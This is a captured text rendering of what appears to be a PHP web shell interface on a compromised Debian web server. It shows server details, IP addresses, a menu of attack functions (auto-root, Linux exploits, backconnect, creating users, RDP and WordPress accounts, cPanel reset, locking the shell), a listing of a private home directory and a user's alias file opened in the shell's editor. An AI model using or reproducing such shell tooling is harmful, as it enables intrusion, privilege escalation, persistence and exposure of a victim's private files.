Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.224.51.10
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.cache
[ DIR ]
drwx------
.config
[ DIR ]
drwx------
.davfs2
[ DIR ]
drwxr-xr-x
.dotfiles
[ DIR ]
drwxr-xr-x
.local
[ DIR ]
drwx------
.oh-my-zsh
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
.vim
[ DIR ]
drwxr-xr-x
.aliasesrc
838
B
-rw-r--r--
.bash_history
2.39
KB
-rw-------
.bash_logout
220
B
-rw-r--r--
.bashrc
3.43
KB
-rw-r--r--
.cloud-locale-test.skip
0
B
-rw-r--r--
.gitconfig
155
B
-rw-r--r--
.profile
675
B
-rw-r--r--
.screenrc
314
B
-rw-r--r--
.viminfo
6.44
KB
-rw-------
.vimrc
2.43
KB
-rw-r--r--
.zcompdump-hurom-ukraine-5.0.7
36.77
KB
-rw-r--r--
.zsh-update
17
B
-rw-r--r--
.zsh_history
8.31
KB
-rw-------
.zshrc
3.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .aliasesrc
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:${HOME}/.dotfiles #alias for cd alias ..='cd ../' alias ...='cd ../../' alias ....='cd ../../../' unsetopt correctall export EDITOR=/usr/bin/vim # for editing common configuration files alias ev='vim ~/.vimrc' alias ez='vim ~/.aliasesrc' alias et='vim ~/.tmux.conf' alias es='vim ~/.screenrc' #for git alias gcl='git clone' alias gs='git status' alias gco='git checkout' alias gp='git push' alias gpl='git pull' alias gc='git commit' alias gl='git log' alias glo='git log --pretty=oneline -n 10' alias ga='git add' alias gb='git branch' alias gf='git fetch' alias fixup='git commit --fixup' #for some commands alias h='history' alias upgrade='sudo apt-get update && sudo apt-get upgrade' alias wget='noglob wget' alias curl='noglob curl'
Close